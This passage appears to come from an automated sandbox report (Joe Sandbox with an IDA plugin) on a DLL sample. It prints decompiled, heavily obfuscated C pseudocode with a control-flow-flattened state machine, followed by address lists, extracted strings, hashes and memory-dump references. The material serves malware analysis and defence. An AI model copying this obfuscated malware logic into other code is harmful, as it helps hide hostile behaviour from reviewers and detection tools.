				_v2752 = _v2752 ^ 0x08d7d48c;
				_v2828 = 0xe83a42;
				_v2828 = _v2828 ^ 0x1f3eb5e2;
				_v2828 = _v2828 * 0x7e;
				_v2828 = _v2828 ^ 0xab9e63e1;
				_v2788 = 0x69d445;
				_v2788 = _v2788 | 0x87a4a8ed;
				_v2788 = _v2788 ^ 0x9a4d3e24;
				_v2788 = _v2788 ^ 0x1da0be74;
				_v2888 = 0x7663d0;
				_v2888 = _v2888 | 0x8f53a1f3;
				_v2888 = _v2888 >> 0xf;
				_v2888 = _v2888 * 0xa;
				_v2888 = _v2888 ^ 0x000d5ba1;
				_v2644 = 0x20e74e;
				_v2644 = _v2644 | 0x742f98e9;
				_v2644 = _v2644 ^ 0x74210d1b;
				_v2904 = 0xfccdb4;
				_t770 = 0xd;
				_v2904 = _v2904 * 0x7c;
				_v2904 = _v2904 >> 0xd;
				_v2904 = _v2904 | 0x17cf49de;
				_v2904 = _v2904 ^ 0x17c7aae5;
				_v2708 = 0xc1d2f2;
				_v2708 = _v2708 + 0xffff5a94;
				_v2708 = _v2708 ^ 0x00cb5d75;
				_v2660 = 0x58d6fe;
				_v2660 = _v2660 + 0x639e;
				_v2660 = _v2660 ^ 0x00518056;
				_v2652 = 0x6bd84b;
				_v2652 = _v2652 + 0xb95a;
				_v2652 = _v2652 ^ 0x00624667;
				_v2700 = 0xf92c4f;
				_v2700 = _v2700 * 0x75;
				_v2700 = _v2700 ^ 0x71e1c3ce;
				_v2892 = 0xd4714c;
				_v2892 = _v2892 + 0xffffadfa;
				_v2892 = _v2892 + 0xd7d2;
				_v2892 = _v2892 << 2;
				_v2892 = _v2892 ^ 0x0358083c;
				_v2900 = 0xca6485;
				_v2900 = _v2900 ^ 0x66674751;
				_v2900 = _v2900 | 0x9fb8fe7f;
				_v2900 = _v2900 ^ 0xffb729be;
				_v2824 = 0x9c46e2;
				_v2824 = _v2824 / _t770;
				_t771 = 0x6e;
				_v2824 = _v2824 * 7;
				_v2824 = _v2824 ^ 0x005409ff;
				_v2832 = 0x773d17;
				_v2832 = _v2832 >> 0xe;
				_v2832 = _v2832 + 0x6313;
				_v2832 = _v2832 ^ 0x000d17fa;
				_v2792 = 0x3014cc;
				_v2792 = _v2792 + 0xffff152c;
				_v2792 = _v2792 + 0xffff3bdf;
				_v2792 = _v2792 ^ 0x002eea21;
				_v2864 = 0x76e575;
				_v2864 = _v2864 | 0xb1b1a986;
				_v2864 = _v2864 * 0x79;
				_v2864 = _v2864 ^ 0x1e28dcc7;
				_v2712 = 0xf7e6ad;
				_v2712 = _v2712 * 0xb;
				_v2712 = _v2712 ^ 0x0aae7ee0;
				_v2808 = 0xd4cb39;
				_v2808 = _v2808 * 0x50;
				_v2808 = _v2808 * 0x75;
				_v2808 = _v2808 ^ 0x6440f87f;
				_v2720 = 0x360163;
				_v2720 = _v2720 + 0xffffc3fc;
				_v2720 = _v2720 ^ 0x0035ed30;
				_v2816 = 0xf63972;
				_v2816 = _v2816 / _t771;
				_v2816 = _v2816 + 0xffff69c4;
				_v2816 = _v2816 ^ 0x0001f3af;
				_v2728 = 0x218a6d;
				_v2728 = _v2728 | 0x0e9fd07f;
				_v2728 = _v2728 ^ 0x0eb1edc0;
				_v2756 = 0x58a84f;
				_v2756 = _v2756 * 0x22;
				_t772 = 0x3d;
				_v2756 = _v2756 / _t772;
				_v2756 = _v2756 ^ 0x0033367e;
				_v2680 = 0x526d89;
				_v2680 = _v2680 << 3;
				_v2680 = _v2680 ^ 0x02908fe9;
				_v2876 = 0xb95aa0;
				_t773 = 0x6f;
				_v2876 = _v2876 / _t773;
				_v2876 = _v2876 + 0x7ba5;
				_v2876 = _v2876 | 0x4bff3dbe;
				_v2876 = _v2876 ^ 0x4bf5695e;
				_v2748 = 0x470f02;
				_t774 = 0x6a;
				_v2748 = _v2748 / _t774;
				_v2748 = _v2748 ^ 0x394a4d48;
				_v2748 = _v2748 ^ 0x39498008;
				_v2684 = 0xb8f542;
				_v2684 = _v2684 * 0x66;
				_v2684 = _v2684 ^ 0x49b10479;
				_v2812 = 0x4a6932;
				_v2812 = _v2812 >> 7;
				_v2812 = _v2812 ^ 0xe4afcb01;
				_v2812 = _v2812 ^ 0xe4ae05c3;
				_v2932 = 0xa851a7;
				_v2932 = _v2932 * 0x2b;
				_v2932 = _v2932 ^ 0x9481cb07;
				_v2932 = _v2932 >> 6;
				_v2932 = _v2932 ^ 0x02246e93;
				_v2872 = 0x6bc7af;
				_v2872 = _v2872 ^ 0x3226b467;
				_v2872 = _v2872 * 0x1e;
				_v2872 = _v2872 << 0xb;
				_v2872 = _v2872 ^ 0x9c8deb19;
				_v2860 = 0x8556fb;
				_v2860 = _v2860 | 0x69e02514;
				_v2860 = _v2860 + 0xedcb;
				_v2860 = _v2860 ^ 0x69e8258b;
				_v2676 = 0xb187db;
				_v2676 = _v2676 << 0xb;
				_v2676 = _v2676 ^ 0x8c3acae2;
				_v2656 = 0xd34daf;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x0009be95;
				_v2804 = 0x3574a6;
				_v2804 = _v2804 >> 9;
				_v2804 = _v2804 * 0x2a;
				_v2804 = _v2804 ^ 0x00009063;
				_v2760 = 0x8f0143;
				_v2760 = _v2760 * 0x43;
				_v2760 = _v2760 >> 3;
				_v2760 = _v2760 ^ 0x04abe301;
				_v2924 = 0x8fc82d;
				_v2924 = _v2924 << 1;
				_v2924 = _v2924 | 0xafdefbbe;
				_v2924 = _v2924 ^ 0xafdce921;
				_v2840 = 0x98b351;
				_v2840 = _v2840 << 0xe;
				_v2840 = _v2840 + 0x39e2;
				_v2840 = _v2840 ^ 0x2cd1b69a;
				_v2648 = 0xefee4b;
				_v2648 = _v2648 + 0xffff46f9;
				_v2648 = _v2648 ^ 0x00ec21a4;
				_v2848 = 0xd96457;
				_v2848 = _v2848 * 0x6c;
				_v2848 = _v2848 ^ 0xa04c0af4;
				_v2848 = _v2848 ^ 0xfbfff8f9;
				_v2856 = 0xd54255;
				_t775 = 0x29;
				_v2856 = _v2856 / _t775;
				_v2856 = _v2856 + 0x5db9;
				_v2856 = _v2856 ^ 0x00024640;
				_v2780 = 0x684df0;
				_v2780 = _v2780 ^ 0x2cfc36b9;
				_v2780 = _v2780 + 0xffffad37;
				_v2780 = _v2780 ^ 0x2c920bcc;
				_v2664 = 0x93e9a1;
				_v2664 = _v2664 ^ 0xb0758ee6;
				_v2664 = _v2664 ^ 0xb0e547c8;
				_v2692 = 0xe0a4a1;
				_v2692 = _v2692 << 0x10;
				_v2692 = _v2692 ^ 0xa4a3a3bd;
				_v2820 = 0x53ca07;
				_t776 = 0x38;
				_v2820 = _v2820 / _t776;
				_v2820 = _v2820 ^ 0x69a52d4a;
				_v2820 = _v2820 ^ 0x69a742e5;
				_v2768 = 0x45adf5;
				_t777 = 0x28;
				_v2768 = _v2768 / _t777;
				_t778 = 0x33;
				_v2768 = _v2768 * 0x6f;
				_v2768 = _v2768 ^ 0x00c7348a;
				_v2672 = 0xa3622d;
				_v2672 = _v2672 * 0x68;
				_v2672 = _v2672 ^ 0x42518aaf;
				_v2732 = 0xe7d257;
				_v2732 = _v2732 << 0xc;
				_v2732 = _v2732 ^ 0x7d2b6ce8;
				_v2908 = 0xb6fcc8;
				_v2908 = _v2908 / _t778;
				_t779 = 0x63;
				_v2908 = _v2908 * 0x4f;
				_v2908 = _v2908 / _t779;
				_v2908 = _v2908 ^ 0x0008aa55;
				_v2736 = 0xa2e201;
				_t780 = 0x24;
				_v2736 = _v2736 / _t780;
				_v2736 = _v2736 ^ 0x0004c10d;
				_v2916 = 0xc480dc;
				_v2916 = _v2916 + 0xffff6830;
				_v2916 = _v2916 << 0xc;
				_v2916 = _v2916 >> 3;
				_v2916 = _v2916 ^ 0x07d4cd30;
				_v2744 = 0x29dac5;
				_v2744 = _v2744 + 0xffff883e;
				_v2744 = _v2744 ^ 0x002f91a3;
				_v2868 = 0xe49a6a;
				_v2868 = _v2868 + 0xb047;
				_v2868 = _v2868 ^ 0x5e8c4957;
				_v2868 = _v2868 * 0x36;
				_v2868 = _v2868 ^ 0xea21adfb;
				_t731 = E00881F6D(_t780);
				_t860 = _v2744;
				_t761 = _t731;
				goto L1;
				do {
					while(1) {
						L1:
						_t874 = _t861 - 0x6dbb171;
						if(_t874 > 0) {
							break;
						}
						if(_t874 == 0) {
							E00882B09(_v2908, _v2636, _v2736, _v2916);
							_pop(_t783);
							_t861 = 0x240e9e1;
							continue;
						} else {
							if(_t861 == 0xb8f10d) {
								_push(_v2872);
								_push(_v2932);
								_push(_v2812);
								_t865 = E0087E1F8(0x8619bc, _v2684, __eflags);
								E008844AD(_v2676, __eflags, _v2656,  &_v1044,  &_v2604, _v2804, _v2760, _t865,  &_v524, _t860, _v2924);
								_t783 = _t865;
								E0087FECB(_t783, _v2840, _v2648, _v2848, _v2856);
								_t868 =  &(_t868[0xf]);
								_t861 = 0x1618198;
								continue;
							} else {
								if(_t861 == 0x1618198) {
									_push(_t783);
									_t783 = _v2780;
									_t743 = E008785FF(_t783, _v2664, __eflags, 0,  &_v1044, 0, _v2692, 1, _v2820);
									_t868 =  &(_t868[7]);
									_t861 = 0x2876e66;
									continue;
								} else {
									if(_t861 == 0x1d2207b) {
										E00880DB1(_v2852,  &_v2084, __eflags, _v2896, _t783, _v2928);
										 *((short*)(E008709DD(_v2740,  &_v2084, _v2844, _v2796))) = 0;
										E0086BAA9(_v2668, _v2772, __eflags, _v2880, _v2920,  &_v1564);
										_push(_v2912);
										_push(_v2724);
										_push(_v2836);
										E00882D0A(_v2752, __eflags,  &_v1564, _v2828, _v2788, _v2888, 0x86188c,  &_v2604,  &_v2084, E0087E1F8(0x86188c, _v2640, __eflags));
										E0087FECB(_t748, _v2644, _v2904, _v2708, _v2660);
										_t868 =  &(_t868[0x16]);
										_t743 = E0086BFBE( &_v2604, _t867, _v2700);
										_pop(_t783);
										__eflags = _t743;
										if(__eflags != 0) {
											_t861 = 0xf749c26;
											continue;
										}
									} else {
										if(_t861 == 0x240e9e1) {
											return E00881538(_v2744, _v2868, _v2628);
										}
										if(_t861 != 0x2876e66) {
											goto L25;
										} else {
											_t743 = E00882B09(_v2768, _t860, _v2672, _v2732);
											_pop(_t783);
											_t861 = 0x6dbb171;
											continue;
										}
										L29:
									}
								}
							}
						}
						L28:
						return _t743;
						goto L29;
					}
					__eflags = _t861 - 0x9e42b00;
					if(_t861 == 0x9e42b00) {
						_t732 = E00880A64(_v2632, _v2636, _v2876, _v2748);
						_t860 = _t732;
						_pop(_t783);
						__eflags = _t732;
						if(__eflags == 0) {
							_t861 = 0x6dbb171;
							goto L25;
						} else {
							_t861 = 0xb8f10d;
							goto L1;
						}
						goto L29;
					} else {
						__eflags = _t861 - 0xa108a7f;
						if(_t861 == 0xa108a7f) {
							_t659 =  &_v2756; // 0x33367e
							_t733 = E0087D8DB( &_v2628,  &_v2636,  *_t659, _v2680);
							asm("sbb esi, esi");
							_pop(_t783);
							_t861 = ( ~_t733 & 0x07a3411f) + 0x240e9e1;
							goto L1;
						} else {
							__eflags = _t861 - 0xbf2cce3;
							if(_t861 == 0xbf2cce3) {
								_t653 =  &_v2764; // 0x33367e
								_t783 = _v2688;
								E00861A34(_t783,  &_v524, _t783, _t783, _v2884, _v2696,  *_t653, _t783, _v2776, _v2784);
								_t868 =  &(_t868[8]);
								_t861 = 0x1d2207b;
								goto L1;
							} else {
								__eflags = _t861 - 0xf749c26;
								if(_t861 != 0xf749c26) {
									goto L25;
								} else {
									_v2624 = E00870CF9();
									_t758 = E008700C5(_t757, _v2824, _v2832);
									_pop(_t804);
									_v2620 = 2 + _t758 * 2;
									_t783 = _v2792;
									_t743 = E0086F726(_t783, _v2704, _v2864, _t761, _v2712, _t761, _t761, _v2808, _t804,  &_v2628, _v2720, _v2816, _t804, _v2728);
									_t868 =  &(_t868[0xc]);
									__eflags = _t743;
									if(__eflags != 0) {
										_t861 = 0xa108a7f;
										goto L1;
									}
								}
							}
						}
					}
					goto L28;
					L25:
					__eflags = _t861 - 0x7aa6196;
				} while (__eflags != 0);
				return _t743;
			}

0x0086a871
0x0086a877
0x0086a881
0x0086a889
0x0086a894
0x0086a89f
0x0086a8aa
0x0086a8b5
0x0086a8c0
0x0086a8cb
0x0086a8d6
0x0086a8e1
0x0086a8ec
0x0086a8f7
0x0086a902
0x0086a90d
0x0086a918
0x0086a923
0x0086a92b
0x0086a938
0x0086a93c
0x0086a943
0x0086a94a
0x0086a94d
0x0086a951
0x0086a959
0x0086a96f
0x0086a976
0x0086a981
0x0086a98c
0x0086a997
0x0086a99f
0x0086a9aa
0x0086a9bc
0x0086a9c1
0x0086a9ca
0x0086a9d5
0x0086a9e0
0x0086a9e8
0x0086a9f0
0x0086a9f8
0x0086aa00
0x0086aa08
0x0086aa0d
0x0086aa17
0x0086aa18
0x0086aa1c
0x0086aa24
0x0086aa2c
0x0086aa34
0x0086aa39
0x0086aa41
0x0086aa49
0x0086aa54
0x0086aa5f
0x0086aa6a
0x0086aa72
0x0086aa80
0x0086aa84
0x0086aa8c
0x0086aa97
0x0086aaad
0x0086aab2
0x0086aabb
0x0086aac6
0x0086aad8
0x0086aadd
0x0086aae6
0x0086aaf1
0x0086aafc
0x0086ab04
0x0086ab0c
0x0086ab17
0x0086ab23
0x0086ab28
0x0086ab2e
0x0086ab3b
0x0086ab3c
0x0086ab40
0x0086ab48
0x0086ab55
0x0086ab59
0x0086ab61
0x0086ab66
0x0086ab6e
0x0086ab79
0x0086ab84
0x0086ab8f
0x0086ab97
0x0086ab9f
0x0086aba4
0x0086abac
0x0086abbf
0x0086abc6
0x0086abd1
0x0086abd9
0x0086abde
0x0086abe6
0x0086abea
0x0086abf2
0x0086abfd
0x0086ac08
0x0086ac13
0x0086ac27
0x0086ac2e
0x0086ac39
0x0086ac44
0x0086ac4c
0x0086ac59
0x0086ac5d
0x0086ac65
0x0086ac70
0x0086ac7b
0x0086ac86
0x0086ac91
0x0086ac99
0x0086aca1
0x0086acab
0x0086acaf
0x0086acb7
0x0086acc2
0x0086accd
0x0086acd8
0x0086ace9
0x0086acec
0x0086acf0
0x0086acf5
0x0086acfd
0x0086ad05
0x0086ad10
0x0086ad1b
0x0086ad26
0x0086ad31
0x0086ad3c
0x0086ad47
0x0086ad52
0x0086ad5d
0x0086ad68
0x0086ad7b
0x0086ad82
0x0086ad8d
0x0086ad95
0x0086ad9d
0x0086ada5
0x0086adaa
0x0086adb2
0x0086adba
0x0086adc2
0x0086adca
0x0086add2
0x0086ade8
0x0086adf7
0x0086adfa
0x0086ae01
0x0086ae0c
0x0086ae14
0x0086ae19
0x0086ae21
0x0086ae29
0x0086ae34
0x0086ae3f
0x0086ae4a
0x0086ae55
0x0086ae5d
0x0086ae6a
0x0086ae6e
0x0086ae76
0x0086ae89
0x0086ae90
0x0086ae9b
0x0086aeae
0x0086aebd
0x0086aec4
0x0086aecf
0x0086aeda
0x0086aee5
0x0086aef0
0x0086af04
0x0086af0b
0x0086af16
0x0086af21
0x0086af2c
0x0086af37
0x0086af42
0x0086af57
0x0086af65
0x0086af6a
0x0086af73
0x0086af7e
0x0086af89
0x0086af91
0x0086af9c
0x0086afa8
0x0086afad
0x0086afb3
0x0086afbb
0x0086afc3
0x0086afcb
0x0086afdd
0x0086afe0
0x0086afe7
0x0086aff2
0x0086affd
0x0086b010
0x0086b017
0x0086b022
0x0086b02d
0x0086b035
0x0086b040
0x0086b04b
0x0086b058
0x0086b05c
0x0086b064
0x0086b069
0x0086b071
0x0086b079
0x0086b086
0x0086b08a
0x0086b08f
0x0086b097
0x0086b09f
0x0086b0a7
0x0086b0af
0x0086b0b7
0x0086b0c2
0x0086b0ca
0x0086b0d5
0x0086b0e0
0x0086b0e8
0x0086b0f3
0x0086b0fe
0x0086b10e
0x0086b115
0x0086b120
0x0086b133
0x0086b13a
0x0086b142
0x0086b14d
0x0086b155
0x0086b159
0x0086b161
0x0086b169
0x0086b171
0x0086b176
0x0086b17e
0x0086b186
0x0086b191
0x0086b19c
0x0086b1a7
0x0086b1b4
0x0086b1b8
0x0086b1c0
0x0086b1ca
0x0086b1d8
0x0086b1dd
0x0086b1e3
0x0086b1eb
0x0086b1f3
0x0086b1fe
0x0086b209
0x0086b214
0x0086b21f
0x0086b22a
0x0086b235
0x0086b240
0x0086b24b
0x0086b253
0x0086b25e
0x0086b270
0x0086b275
0x0086b27e
0x0086b289
0x0086b294
0x0086b2a6
0x0086b2ab
0x0086b2bc
0x0086b2bf
0x0086b2c6
0x0086b2d1
0x0086b2e4
0x0086b2eb
0x0086b2f6
0x0086b301
0x0086b309
0x0086b314
0x0086b324
0x0086b32d
0x0086b330
0x0086b33c
0x0086b340
0x0086b348
0x0086b35a
0x0086b35d
0x0086b364
0x0086b36f
0x0086b377
0x0086b37f
0x0086b384
0x0086b389
0x0086b391
0x0086b39c
0x0086b3a7
0x0086b3b2
0x0086b3ba
0x0086b3c2
0x0086b3cf
0x0086b3d3
0x0086b3e2
0x0086b3e7
0x0086b3ee
0x0086b3ee
0x0086b3f0
0x0086b3f0
0x0086b3f0
0x0086b3f0
0x0086b3f6
0x00000000
0x00000000
0x0086b3fc
0x0086b668
0x0086b66e
0x0086b66f
0x00000000
0x0086b402
0x0086b408
0x0086b5b7
0x0086b5c0
0x0086b5c4
0x0086b5da
0x0086b61d
0x0086b629
0x0086b640
0x0086b645
0x0086b648
0x00000000
0x0086b40e
0x0086b414
0x0086b57a
0x0086b599
0x0086b5a5
0x0086b5aa
0x0086b5ad
0x00000000
0x0086b41a
0x0086b420
0x0086b473
0x0086b49b
0x0086b4bc
0x0086b4c9
0x0086b4cd
0x0086b4d4
0x0086b523
0x0086b543
0x0086b548
0x0086b561
0x0086b567
0x0086b568
0x0086b56a
0x0086b570
0x00000000
0x0086b570
0x0086b422
0x0086b428
0x00000000
0x0086b814
0x0086b434
0x00000000
0x0086b43a
0x0086b451
0x0086b457
0x0086b458
0x00000000
0x0086b458
0x00000000
0x0086b434
0x0086b420
0x0086b414
0x0086b408
0x0086b81f
0x0086b81f
0x00000000
0x0086b81f
0x0086b679
0x0086b67f
0x0086b7d3
0x0086b7d8
0x0086b7db
0x0086b7dc
0x0086b7de
0x0086b7ea
0x00000000
0x0086b7e0
0x0086b7e0
0x00000000
0x0086b7e0
0x00000000
0x0086b685
0x0086b685
0x0086b68b
0x0086b78e
0x0086b79c
0x0086b7a6
0x0086b7ae
0x0086b7af
0x00000000
0x0086b691
0x0086b691
0x0086b697
0x0086b753
0x0086b767
0x0086b76e
0x0086b773
0x0086b776
0x00000000
0x0086b69d
0x0086b69d
0x0086b6a3
0x00000000
0x0086b6a9
0x0086b6c3
0x0086b6ca
0x0086b6cf
0x0086b6ed
0x0086b71c
0x0086b723
0x0086b728
0x0086b72b
0x0086b72d
0x0086b733
0x00000000
0x0086b733
0x0086b72d
0x0086b6a3
0x0086b697
0x0086b68b
0x00000000
0x0086b7ef
0x0086b7ef
0x0086b7ef
0x00000000

Strings

B:, xrefs: 0086AC44
uv, xrefs: 0086AE55
~63, xrefs: 0086B753
~63, xrefs: 0086AF5E, 0086AF4D, 0086AC1E
BbJ, xrefs: 0086A981
/e, xrefs: 0086ABEA
!., xrefs: 0086AE4A
HMJ9, xrefs: 0086AFE7
9, xrefs: 0086B176
h, xrefs: 0086ABA4
K, xrefs: 0086B186
l+}, xrefs: 0086B309
xs,, xrefs: 0086AAF1
N , xrefs: 0086ACB7
QGgf, xrefs: 0086ADBA
\\, xrefs: 0086AA54
05, xrefs: 0086AEE5
2iJ, xrefs: 0086B022
$P, xrefs: 0086A936

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: h$!.$$P$/e$05$2iJ$B:$BbJ$HMJ9$K$N $QGgf$\\$uv$xs,$~63$~63$9$l+}
API String ID: 0-4215899151
Opcode ID: 9ef1eac693d6f68bd5d9b81c9c355b0391b458d2c6c33821d87355b064421cd4
Instruction ID: d106495389bc5bd9f9d3bc3a4aa8bb483eeba87cecbe21e174cd1ca2c4060bc9
Opcode Fuzzy Hash: 9ef1eac693d6f68bd5d9b81c9c355b0391b458d2c6c33821d87355b064421cd4
Instruction Fuzzy Hash: CF72DE725093819FD378CF25D54AB8BBBE2FBC4348F10891DE69996260DBB19948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00870F86, Relevance: 23.2, Strings: 18, Instructions: 723
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00870F86(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				void* _t824;
				void* _t825;
				void* _t829;
				void* _t832;
				void* _t844;
				void* _t850;
				void* _t853;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				void* _t882;
				void* _t901;
				void* _t957;
				intOrPtr _t975;
				intOrPtr* _t978;
				signed int _t980;
				signed int _t981;
				void* _t982;
				intOrPtr _t986;
				void* _t987;
				void* _t994;
				void* _t996;

				_t978 = __ecx;
				_v96 = __ecx;
				_v88 = 0xce16ef;
				_t986 = 0;
				_t853 = 0x87433f6;
				_v84 = 0;
				_v80 = 0;
				_v412 = 0xef09b0;
				_v412 = _v412 + 0xffff239a;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0xffffb1af;
				_v412 = _v412 ^ 0xffffb567;
				_v144 = 0xb2550e;
				_v144 = _v144 << 6;
				_v144 = _v144 ^ 0x2c954380;
				_v160 = 0xa1df5c;
				_v160 = _v160 * 0x60;
				_v160 = _v160 ^ 0x3cb3c280;
				_v288 = 0x7a32d8;
				_v288 = _v288 | 0x8c6c9666;
				_v288 = _v288 ^ 0x041f8caf;
				_v288 = _v288 ^ 0x88613a51;
				_v348 = 0xdf5e12;
				_v348 = _v348 | 0xa5ea5eb7;
				_v348 = _v348 ^ 0xa5ff5eb7;
				_v296 = 0x7009ff;
				_v296 = _v296 + 0xffff1527;
				_v296 = _v296 + 0x576a;
				_v296 = _v296 ^ 0x006f7690;
				_v372 = 0x1f54b;
				_t860 = 0x52;
				_v372 = _v372 * 0x5a;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 / _t860;
				_v372 = _v372 ^ 0x00000044;
				_v332 = 0x772df1;
				_v332 = _v332 + 0x4853;
				_v332 = _v332 ^ 0x166147d5;
				_v332 = _v332 ^ 0x16163191;
				_v240 = 0x1a1abb;
				_v240 = _v240 ^ 0xbdfc81b5;
				_v240 = _v240 | 0x1ef02f35;
				_v240 = _v240 ^ 0xbff6bf3f;
				_v232 = 0x620327;
				_v232 = _v232 + 0xffffc934;
				_t861 = 0x13;
				_v232 = _v232 / _t861;
				_v232 = _v232 ^ 0x000525b3;
				_v208 = 0xe2fff2;
				_t980 = 0x39;
				_v208 = _v208 * 0x78;
				_v208 = _v208 ^ 0x6a67f970;
				_v344 = 0xf3734c;
				_v344 = _v344 >> 0x10;
				_v344 = _v344 / _t980;
				_v344 = _v344 ^ 0x00000004;
				_v300 = 0x170e40;
				_v300 = _v300 | 0xfbde795f;
				_v300 = _v300 ^ 0xfbde9330;
				_v260 = 0xd4f3ae;
				_v260 = _v260 ^ 0x9e22b963;
				_v260 = _v260 * 0x2e;
				_v260 = _v260 ^ 0x904fea8f;
				_v356 = 0x4c8d9b;
				_v356 = _v356 | 0xd47535dd;
				_v356 = _v356 + 0xffffd433;
				_t862 = 0x64;
				_v356 = _v356 * 0x59;
				_v356 = _v356 ^ 0xdfa15942;
				_v308 = 0xbd9260;
				_v308 = _v308 >> 0xe;
				_v308 = _v308 * 0x79;
				_v308 = _v308 ^ 0x000cbe7b;
				_v252 = 0xa2f51d;
				_v252 = _v252 + 0x749;
				_v252 = _v252 << 0xd;
				_v252 = _v252 ^ 0x5f854687;
				_v292 = 0x216e58;
				_v292 = _v292 / _t862;
				_v292 = _v292 + 0xffff8880;
				_v292 = _v292 ^ 0xfff3b1bc;
				_v176 = 0xac4eb4;
				_v176 = _v176 | 0xd866b52c;
				_v176 = _v176 ^ 0xd8e8b8b7;
				_v236 = 0x7a6201;
				_v236 = _v236 ^ 0x2461ec4e;
				_t863 = 0xa;
				_v236 = _v236 * 0x35;
				_v236 = _v236 ^ 0x79bb4b53;
				_v220 = 0xf5a9fb;
				_v220 = _v220 << 1;
				_v220 = _v220 >> 5;
				_v220 = _v220 ^ 0x000a39a7;
				_v380 = 0x7beff6;
				_v380 = _v380 / _t863;
				_v380 = _v380 | 0x5a206f9b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x7c9823d9;
				_v284 = 0xdc7201;
				_v284 = _v284 ^ 0xec4f9d75;
				_v284 = _v284 << 8;
				_v284 = _v284 ^ 0x93e140b6;
				_v396 = 0x36b797;
				_v396 = _v396 + 0x83f2;
				_v396 = _v396 | 0xb5da4ffa;
				_v396 = _v396 ^ 0x8c9f27f1;
				_v396 = _v396 ^ 0x3962cb66;
				_v364 = 0x608af6;
				_v364 = _v364 >> 0xe;
				_v364 = _v364 ^ 0xb06c2668;
				_v364 = _v364 >> 0xa;
				_v364 = _v364 ^ 0x0022b374;
				_v404 = 0xe18b1f;
				_v404 = _v404 + 0xffff49de;
				_v404 = _v404 + 0xffffa950;
				_v404 = _v404 >> 5;
				_v404 = _v404 ^ 0x000802e7;
				_v168 = 0x720eed;
				_v168 = _v168 | 0xf4577aa8;
				_v168 = _v168 ^ 0xf4704e8f;
				_v328 = 0x5e39f;
				_v328 = _v328 * 0x2a;
				_v328 = _v328 ^ 0x47860790;
				_v328 = _v328 ^ 0x47706e69;
				_v336 = 0xdd3db6;
				_v336 = _v336 ^ 0x0be1064e;
				_v336 = _v336 ^ 0xe0fa941c;
				_v336 = _v336 ^ 0xebc1ff07;
				_v340 = 0x8bacdf;
				_t864 = 0x49;
				_v340 = _v340 / _t864;
				_t865 = 0x77;
				_v340 = _v340 * 0x4d;
				_v340 = _v340 ^ 0x0099a7e7;
				_v440 = 0x29fcf0;
				_v440 = _v440 >> 4;
				_v440 = _v440 ^ 0x37539152;
				_v440 = _v440 / _t865;
				_v440 = _v440 ^ 0x007580f6;
				_v400 = 0x753dd5;
				_v400 = _v400 ^ 0x142a6b84;
				_v400 = _v400 ^ 0x6d30c2ad;
				_v400 = _v400 ^ 0xe014bebf;
				_v400 = _v400 ^ 0x997c2220;
				_v128 = 0x8b3cd;
				_v128 = _v128 << 2;
				_v128 = _v128 ^ 0x002b9a55;
				_v408 = 0x5fd2f;
				_v408 = _v408 >> 9;
				_t866 = 0x69;
				_v408 = _v408 * 0x53;
				_v408 = _v408 * 0x58;
				_v408 = _v408 ^ 0x00501640;
				_v416 = 0x7e5e32;
				_v416 = _v416 | 0x37c3b1cb;
				_v416 = _v416 + 0x4e4b;
				_v416 = _v416 | 0xc7e68b70;
				_v416 = _v416 ^ 0xffec3e94;
				_v304 = 0xac72e0;
				_v304 = _v304 + 0xffff9516;
				_v304 = _v304 | 0x0ab72207;
				_v304 = _v304 ^ 0x0aba1474;
				_v424 = 0x91a63a;
				_v424 = _v424 | 0xeda6ffa9;
				_v424 = _v424 ^ 0xa7761782;
				_v424 = _v424 << 0xe;
				_v424 = _v424 ^ 0x7a08e30a;
				_v436 = 0x9e7f8b;
				_v436 = _v436 | 0x84ca61f6;
				_v436 = _v436 << 2;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 ^ 0xb78cfbfa;
				_v216 = 0x303808;
				_v216 = _v216 + 0xef78;
				_v216 = _v216 / _t980;
				_v216 = _v216 ^ 0x000455e2;
